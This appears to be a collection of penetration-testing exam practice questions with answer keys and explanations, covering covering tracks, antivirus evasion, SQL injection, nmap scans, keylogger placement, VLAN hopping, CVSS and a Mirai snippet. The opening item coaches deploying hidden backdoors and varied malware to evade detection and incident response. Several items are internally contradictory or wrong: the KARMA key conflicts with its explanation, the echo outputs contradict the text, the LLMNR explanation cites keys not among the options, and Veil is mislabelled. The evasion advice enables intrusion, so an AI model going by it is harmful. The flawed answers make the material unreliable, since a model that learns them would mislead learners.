As a pen tester, covering your tracks is as important, maybe more, than lateral movement in the post-exploitation process. Which of the following should you NOT do to cover your tracks?
A.You should vary your malware on the network.
B.You should secretly deploy backdoors.
C.You should infect most of the hosts on the company’s network to hide your movement.
D.You should use a VPN to facilitate bypassing some network monitoring.
C.You should infect most of the hosts on the company’s network to hide your movement.
Explanation:
You should NOT infect most of the hosts on the company’s network to hide your movement. If you do that, your presence will be put out in the open. If you only infect a few hosts and keep them updated, then the intrusion detection systems (IDSs) may not detect your presence, and it will be harder for incident response to deal with it.
You should deploy backdoors to allow you persistence in some of the hosts. As long as they are hidden or encrypted, then your tracks are covered, and you do not have to re-hack your way back in to the network.
You should vary your malware on the network. Having a massive malware dump of the same kind with the same signature will set off enterprise alerts. If you have a few, varied malware on the systems, it can throw off incident response.
You should use a VPN to facilitate bypassing some network monitoring. Of course, you should hide your IP address to eliminate fingers being pointed back to you. Most VPNs can be double servers, or Peer-to Peer (P2P) encrypted. Peer-to-peer encryption is creating a file sharing (i.e. torrent) of network between hosts.
As part of a penetration test, you aim to evade antivirus checks that the target organization has put in place. Which of the following frameworks would you use?
A.W3AF
B.Nikto
C.Tor
D.Veil
D.Veil
Explanation:
Veil is a Metasploit framework typically used to evade both security controls and antivirus.
Tor (The Onion Router) is a tool which allows for the user to browse the internet anonymously. It does this by routing IP traffic through an expansive network of Tor relays, constantly changing the way it routes this traffic. This in turn obscures the user’s location and makes it extremely difficult to trace traffic back to the user.
Nikto is an open-source web vulnerability scanner.
W3AF is a web application vulnerability scanner. It is open source and has many available plugins.
You are doing a penetration test for InterConn, and in your reconnaissance, you find their website with a front-facing web application. It seems like their input fields are not filtered. Which attack method is the BEST one to use in this scenario?
A.SQL injection
B.Brute force
C.DDoS
D.XSS
A.SQL injection
Explanation:
The best attack to use in this scenario is SQL injection. SQL injection could allow you access to the database for usernames, emails, and passwords. Therefore, it is the BEST option in this scenario. You need to attack the site, not the clients that use the site, so a SQL injection would make the most sense as it attacks the server and not the clients.
A cross-site scripting (XSS) would not be the best in this scenario. In XSS attacks, hackers exploit input and scripting vulnerabilities to launch a malicious script on the client-side browser. XSS includes stored, reflected, and DOM-based attacks.
Brute force would not be the best in this scenario. Brute force is a password cracking technique that tries every possible combination of characters repeatedly to guess a password. This technique is the most efficient when the hacker has already gained information, like children’s and pet names, car models, and street addresses, from social engineering.
The scenario would not be a good candidate for Distributed Denial of Service (DDoS) or a DoS attack. A DoS attack occurs when a target’s resources or network bandwidth is flooded with the intent of making the target unresponsive. DDoS is a variant of DOS, where multiple systems, known as zombies, bots, or drones, flood the target in single botnet, so as to bring down the system more efficiently and anonymously. DDoS would make InterConn’s site go down, not give us access to the devices.
You have been hired to conduct a pentest of an organization. What would be a correct way to scan the HTTP port of the given host using the most aggressive timing template?
A.nmap -p80 -T5 10.10.10.10/24
B.nmap -p 443 -T1 10.10.10.10/24
C.nmap -sS443 -T5 10.10.10.10/24
D.nmap -sS80 -T0 10.10.10.10/24
A.nmap -p80 -T5 10.10.10.10/24
Explanation:
The command nmap -p80 -T5 10.10.10.10/24 is the correct way to select the HTTP port in an Nmap scan. The parameter -T5 is the most aggressive timing template. Timing templates are specified with the -T command and range from the numbers 0 through 5. The parameter -T0 takes the longest time to scan a network and is extremely unlikely to set off any IDS alerts due to the slow speed of packets. The parameter -T5 is much quicker, but is very likely to set of IDS alerts.
Therefore, the correct way to select a port is by using the command -pnumber. There is no space between the command and the port number. The following exhibit shows an example of this command:
The -p 443 parameter not the correct way to have a port scan because there is a space in between the –p and the number. In addition, port 443 is used by HTTPS, not HTTP.
The -sS parameter of the Nmap command performs a SYN scan. It is not used for port selection. The following exhibits shows the output of this parameter:
You have physical access to a network administrator’s computer. What are some ways you can drop a keylogger onto their computer? (Choose all that apply.)
A.Connect it to the USB drive on the back of the computer.
B.Use a USB cable attachment that runs to the keyboard.
C.Plug it directly into the keyboard.
D.Implement an acoustic keylogger.
E.Swap out the keyboard for a bugged one
A.Connect it to the USB drive on the back of the computer.
B.Use a USB cable attachment that runs to the keyboard.
D.Implement an acoustic keylogger.
E.Swap out the keyboard for a bugged one
Recently a sensitive server was reached on what should have been a secure VLAN. It was accomplished by using VLAN hopping.
Which of the following is a defense against VLAN hopping?
A.Implement DAI.
B.Disable the use of CDP.
C.Disable the use of DTP.
D.Implement DHCP snooping.
C.Disable the use of DTP.
Explanation:
You would disable the use of DTP. Dynamic Trunking Protocol (DTP) is a now discredited protocol that in the past was used to automatically negotiate the creation of a trunk link between two switches. Trunk links are able to carry the traffic of multiple VLANs. If a user is able to use the protocol to negotiate a trunk link between their device and the switch, they would be able to receive the traffic from VLANs to which they should not have access. It is a best practice to disable DTP on switch ports to prevent this form of VLAN hopping.
Disabling Cisco Discovery Protocol (CDP) can prevent gathering information about Cisco devices that is contained in CDP packets, but will not prevent VLAN hopping.
Implementing DHCP snooping allows the switch to see all DHCP traffic and record the IP address-to-MAC address mappings. These mappings can be used to rouge DHCP servers by permitting DHCP traffic only on the port where the legitimate DHCP server is located. It will not prevent VLAN hopping attacks.
Dynamic ARP Inspection (DAI), when configured, allows the switch to utilize the mappings created by DHCP snooping to check all ARP messages and to disallow any ARP changes that deviate from the DHCP mappings. This can help prevent ARP pollution, but will not stop VLAN hopping.
You are working for a contracting company that was employed by the federal government. Which organization’s publications are likely to be most closely related to your security compliance standards?
A.NIST
B.US-CERT
C.JPCERT
D.CVE
A.NIST
Explanation:
The National Institute of Standards and Technology (NIST) is an agency of the U.S Department of Commerce. Its main focus is to promote innovation and assessing organizations in the risk they encounter. Their publications will be most closely related to your security compliance standards.
Japan Computer Emergency Response Team (JPCERT) coordinates with Japanese network service providers, security vendors, and government agencies to provide incident response. They also gather and disseminate technical information on computer security incidents and vulnerabilities and security fixes, and other security information, as well as issue alerts and warnings.
The U.S. Computer Emergency Readiness Team (US-CERT) is an organization that was established by the U.S. Department of Homeland Security to analyze and reduce cyber threats and vulnerabilities, disseminate cyber threat warning information, and coordinate incident response activities. However, they do not provide security compliance standards.
Common Vulnerabilities and Exposure (CVE) is a list of common identifiers for publicly known cybersecurity vulnerabilities. With a standardized description for each vulnerability or exposure, they are more of a dictionary than a database. CVE helps provide rankings on discovered vulnerabilities, but does not provide security compliance standards.
Which of the following entities would most likely require an attestation of findings after the completion of a penetration test? (Choose all that apply.)
A.regulatory agency
B.competitor
C.federal, state, or local government
D.partner
A.regulatory agency
C.federal, state, or local government
D.partner
Explanation:
An attestation of findings after the completion of a penetration test are most likely required by the following entities:
Partners Federal, state, or local government Regulatory agencies
Partner contracts may contain stipulations regarding security and penetration test. As a result, organizations may need an attestation of findings for compliance.
Federal, state, or local governmental regulations or regulatory agencies may require an organization to provide (or keep on hand) an attestation of findings to provide compliance.
After all your scans and tests, you must determine if a vulnerability is exploitable. First you need to identify an exploit for the vulnerability. Then you must prioritize your vulnerabilities. Standard protocol would have you start with the highest-severity vulnerabilities that have the greatest likelihood of being exploited.
Which of the following would you use to prioritize your vulnerabilities/exploits by the highest severity? (Choose three.)
A.The CVSS V2 database says it has a 9.0 base score or higher.
B.It was found via a mass vulnerability scan.
C.It has a matching module in the Metasploit framework.
D.It is not on a critical server, but is being actively exploited.
A.The CVSS V2 database says it has a 9.0 base score or higher.
C.It has a matching module in the Metasploit framework.
D.It is not on a critical server, but is being actively exploited.
Explanation: As a general rule, if a vulnerability has a matching module in Metasploit, it should almost always be considered high severity. That means that it has been out for long enough and has been seen in enough hacking attempts for someone to have created a module for it.
Also, if you run across an exploit that is alive and being actively exploited, another general rule of thumb is to tell your client immediately. There may be confidential information leaking out to the hackers.
CVSS is the Common Vulnerability Scoring System, which is an open framework for communicating the characteristics and severity of software vulnerabilities. CVSS consists of three metric groups: Base, Temporal, and Environmental. The Base metrics produce a score ranging from 0 to 10. Level 9 in both the CVSS V2 and V3 rating is severe. Please fix these issues immediately.
The mass vulnerability scan findings are not a high-priority finding. Those must be vetted to make sure they are not a false positive.
One of the pen testers was successful in cloning the company’s AP, jamming the frequency on which the company’s AP operates and causing several clients to associate with the fake AP. The users have a preconfigured WLAN profile that specifies the proper SSID, and for user convenience, also specifies their WLAN credentials.
What type of attack is MOST LIKELY being conducted?
A.fragmentation attack
B.credential harvesting
C.deauthentication attack
D.KARMA attack
D.KARMA attack
Explanation:
The most likely attack is credential harvesting. When the AP’s operating frequency is jammed, it causes all stations to disconnect from the AP. Then the stations will do as they are designed and will seek another AP with the same SSID. When they locate the fake AP, they will send probe requests. The probe requests will include the credentials specified in the scenario, which can then be harvested.
It is not likely to be a fragmentation attack. A wireless fragmentation attack is designed to capture elements of the pseudo-random generation algorithm (PRGA) and does not include the use of a fake AP.
It is not likely to be a deauthentication attack. That is a DoS attack in which the tester or hacker sends deauthentication frames, which causes stations to disconnect from the AP and making wireless communication impossible.
It is not likely to be a KARMA attack. In a Karma Attacks Radioed Machines Automatically (KARMA) attack, the goal is to enumerate and generate SSIDs which the stations (which can include phones, laptops, and anything with a radio) have saved in their Preferred Network List (PNL). These are network profiles saved in the station, complete with credentials, that stations attempt to locate with probe requests at all times when they are not associated with an AP.
While practicing your basic commands before a white box penetration test, you type the following:
$ echo “There is a lot of space here”
What will be the output? A.None of these B.Thereisalotofspacehere C.There is a lot of space here D.There is a lot of space here
C.There is a lot of space here
Explanation:
Using the quotes on the string in the echo command will result in that string being echoed exactly as specified. In this case the output will be:
There is a lot of space here
If you do not use the quotes, as shown in the following example, the echo command automatically trims extra spaces between words:
$ echo There is a lot of space here
The output from that command would be:
There is a lot of space here
You are performing a pen test and would like to determine if the LLMNR service is disabled as policy specifies.
Which Windows registry key on each device can be reviewed for the proper setting?
A.HKLM\SYSTEM\Policies\Microsoft\Windows NT\Parameters
B.HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\
C.HKLM\Software\Policies\Microsoft\Windows NT\DNSClient
D.HKLM\Security\Policies\Microsoft\Windows NT\DNSClient
C.HKLM\Software\Policies\Microsoft\Windows NT\DNSClient
Explanation:
The registry key to check if the LLMNR service is disabled is located at HKLM\Software\Policies\Microsoft\Windows NT\DNSClient, as shown in the exhibit below, using the registry editor. If the value is set to 0, Link-Local Multicast Name Resolution (LLMNR) is disabled.
The key is not located at HKEY_CURRENT_USER\Control Panel\Desktop. This controls settings such as MenuShowDelay, which can be used to speed up the appearance of the Start menu.
The key is not located at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion. These settings control behavior during an update, such as the Uninstall setting. If you have had a problem uninstalling a program – for example, if the uninstall has gone wrong or you have simply deleted it – you may still see it listed in the Uninstall or change a program list in the Control Panel. This setting, when deleted, will stop that behavior.
The key is not located at HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces. At that location, NetBIOS, another vulnerable name resolution service, can be disabled. To disable it, the DWORD value for NetbiosOptions should be changed to 2 as shown below:
Value 0 keeps the default setting, which is to use the NetBIOS settings from the DHCP server, whilst setting this value as 1 enables NetBIOS over TCP/IP.
You teach a Linux course and have a large list of students enrolled in the course. After registration is complete, you need to sort the list of names alphabetically using commands on the Linux shell. You need a way to connect your output command with your sorting command.
Which of the following will you use to accomplish this task?
A.pipe operator (|)
B.split
C.cat
D.redirection operator(>)
A.pipe operator (|)
Explanation:
You should use the pipe operator (|) to connect your output command with your sorting command.
The pipe operator (|) allows you to connect commands. The following command feeds the given text (three names) into the sort command:
$ echo -e “Carla\Arthur\nBrian”|sort
The output of that command would be as follows:
Arthur
Brian
Carla
There are many filters available to use on text streams to get a desired result.
The redirection operator (>) allows you to save the output of a command to a file, as shown in the following command:
$echo “These are the contents of the file named echofile” > echofile
The cat command (short for concatenate) allows you to display the contents of a file on the standard output (stdout). The following example would display the contents of the echofile file:
$ cat echofile
The split command is used to create static-sized pieces from an input to a set output file(s). You can set some conditions though on how you would like it to be cut, or split, into separate files.
Which of the following is MOST likely to be affected by the Wassenaar Arrangement?
A.The tools that can be used to perform the pen test
B.The permitted locations for pen testing to occur
C.The permitted time periods in which pen testing can occur
D.The identity of the individuals who can perform the pen test
A.The tools that can be used to perform the pen test
Explanation:
The Wassenaar Arrangement was established for export control of conventional arms and dual-use (civilian/military) goods and technologies. Some of the tools used in pen testing might incorporate technologies that may not be allowed to be used in the country where the organization undergoing the test is headquartered or located.
These types of export restrictions cover technologies and products and do not address issues such as the identity of the tester, the permitted locations, or time periods.
A security analyst was provided with a detailed penetration report, which was performed against the organization’s resources. It was noted on the report that a vulnerability on a file server has the following detailed CVSS 3.1 vector:
CVSS:3.1/AV:P/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N
Which metric group in this vector should be of the highest concern to the security analyst?
A.Attack Vector
B.Integrity
C.Confidentiality
D.Availability
C.Confidentiality
Explanation:
The security analyst should be most concerned with the Confidentiality or C metric group because that metric group is rated as H or High. This means that there would be a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.
The Integrity metric group is rated at L or Low. This means modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is limited. This is not as high as the C rating.
The Availability metric group is rated at N or None, meaning that there is no impact to availability within the impacted component.
The Attack Vector metric group is rated P or Physical, meaning that the attack requires the attacker to physically touch or manipulate the vulnerable component
Which of the following is NOT an important factor in creating the communication escalation path?
A.stakeholder team structure
B.secure communication protocols
C.communication schedule
D.contact information for all stakeholders
A.stakeholder team structure
Explanation:
A proper communication escalation path identifies who the tester should contact, how often contact can be made, and under what conditions the stakeholders should be contacted. It also includes their contact information. Specifically, it should include:
Contact information for all relevant stakeholders Frequency of communication with the stakeholders Method of communication with the stakeholders Individuals to contact in case of emergency
The internal team structure for stakeholders is not typically used in the process of creating a communication escalation path.
Your organization has become aware of issues with technology products that contain security issues out of the box, such as backdoors. You have been hired to perform a pen test of a product provided by a specific vendor. What type of assessment are you performing?
A.goals-based
B.objective-based
C.supply chain
D.compliance
C.supply chain
Explanation:
A supply chain assessment is used to verify that all software and hardware that was not developed by the organization, but by third parties, is free of vulnerabilities.
In goals-based or objective-based assessments, the company and the penetration tester agree on a specific goal or outcome.
Organizations that are regulated by laws such as HIPAA, PCI-DSS and other legislation typically perform a compliance-based assessment. In this type of assessment, all efforts are made to verify compliance with the requirements of the regulations. However, some compliance-based assessments are performed to verify that organizations are in compliance with their own corporate policies.
A penetration tester identifies the following findings during an external vulnerability scan:
Vulnerability Ports Unencrypted authentication 20 Unencrypted data 21 SSLv3 accepted on HTTPS connections 443 Windows Server 2012 host found 21
Which is the BEST answer for these findings?
A.FTP server configurations may reveal sensitive information.
B.Weak authentication practices may be used.
C.Identical credentials are used on multiple systems.
D.Obsolete software may contain exploitable components.
A.FTP server configurations may reveal sensitive information.
Explanation:
Based on the findings, FTP server configuration may reveal sensitive information. By default, FTP uses ports 20 and 21 and is not encrypted. This means that both authentication and data can be intercepted.
Obsolete software with exploitable components is not the main problem. None of the findings shown list software that is no longer supported. Windows Server 2012 is supported until October 2023, as of this writing.
Weak authentication practices are not the main problem. FTP sends authentication information in plaintext. The problem is not the authentication mechanism, but rather it is the implementation of FTP.
Identical credentials being used on multiple systems is not the main problem. None of the given findings relate to this issue. Identical credentials would allow an attacker to use the same credentials across multiple systems.
FTP can be implemented with SSL to provide encryption for both authentication and data. This would prevent attackers from being able to read the information transmitted.
Users have been complaining about a program constantly crashing. What tool would you use to find out more information as to why the crashes occur?
A.Immunity Debugger
B.BeEF
C.GDB
D.Theharvester
C.GDB
Explanation:The GNU Project Debugger (GDB) is a widely popular debugger with many features. With this program, you can understand what a program was doing when it crashed.
The answer is not BeEF. BEeEF is a web application testing framework. Its main purpose is to exploit vulnerabilities in web browsers.
The answer is not the Immunity Debugger. This tool supports a Python-based API. It allows for the writing of exploits, analyzation of malware, and reverse engineering of binary files.
The answer is not Theharvester. It is a tool which is used to enumerate DNS information about a given hostname/IP address.
An incident responder discovers the following code that has infected an IoT device:
Killer_kill_by_port (htons(23))
What can the incident responder conclude from inspecting the code?
A.The malware is attempting to kill the SSH service and prevent it from restarting.
B.The malware is attempting to eradicate other botnet processes.
C.The malware is carrying out a GRE flood.
D.The malware is attempting to kill the Telnet service and prevent it from restarting.
D.The malware is attempting to kill the Telnet service and prevent it from restarting.
Explanation:
Killer_kill_by_port (htons(23)) tries to kill processes running Telnet. This code is part of advanced malware (such as Mirai, which targeted Dyn servers in 2016) that is designed to find and infect IoT devices. After infection, the devices become a launch pad for DDoS attacks. The specific kill process is a way for the code to protect itself. It would kill other processes running SSH, Telnet, and HTTP to prevent the owner from gaining remote access to the IoT device while it is infected.
While the malware would also kill processes running SSH, the highlighted code kills port 23 (not port 22). Port 23 is used by Telnet.
While this specific line of code is not responsible, malware can also locate and eradicate other botnet processes from memory, a process known as memory scraping.
While this specific line of code is not responsible, malware can also launch different types of attacks, such as a GRE flood, where inbound traffic is designed to look like it is generic routing encapsulation (GRE) data packets. GRE is a communication protocol used to establish a direct, point-to-point connection between network nodes.
There are a total of 65,535 ports in the TCP/IP protocol that are vulnerable to attacks. You should know the following commonly used ports and protocols.
FTP - ports 20 and 21
SSH, SCP, and SFTP - port 22
Telnet - port 23
SMTP - port 25
TACACS - port 49
DNS server - port 53
DHCP - ports 67 and 68
TFTP - port 69
HTTP - port 80
Kerberos - port 88
POP3 - port 110
NetBIOS - ports 137-139
IMAP4 - port 143
SNMP - port 161
LDAP - port 389
SSL and HTTPS - port 443
SMB - port 445
LDAP with SSL - port 636
FTPs - ports 989, 990
Microsoft SQL Server - port 1433
Point-to-Point Tunneling Protocol (PPTP) - port 1723
RDP protocol and Terminal Services - port 3389
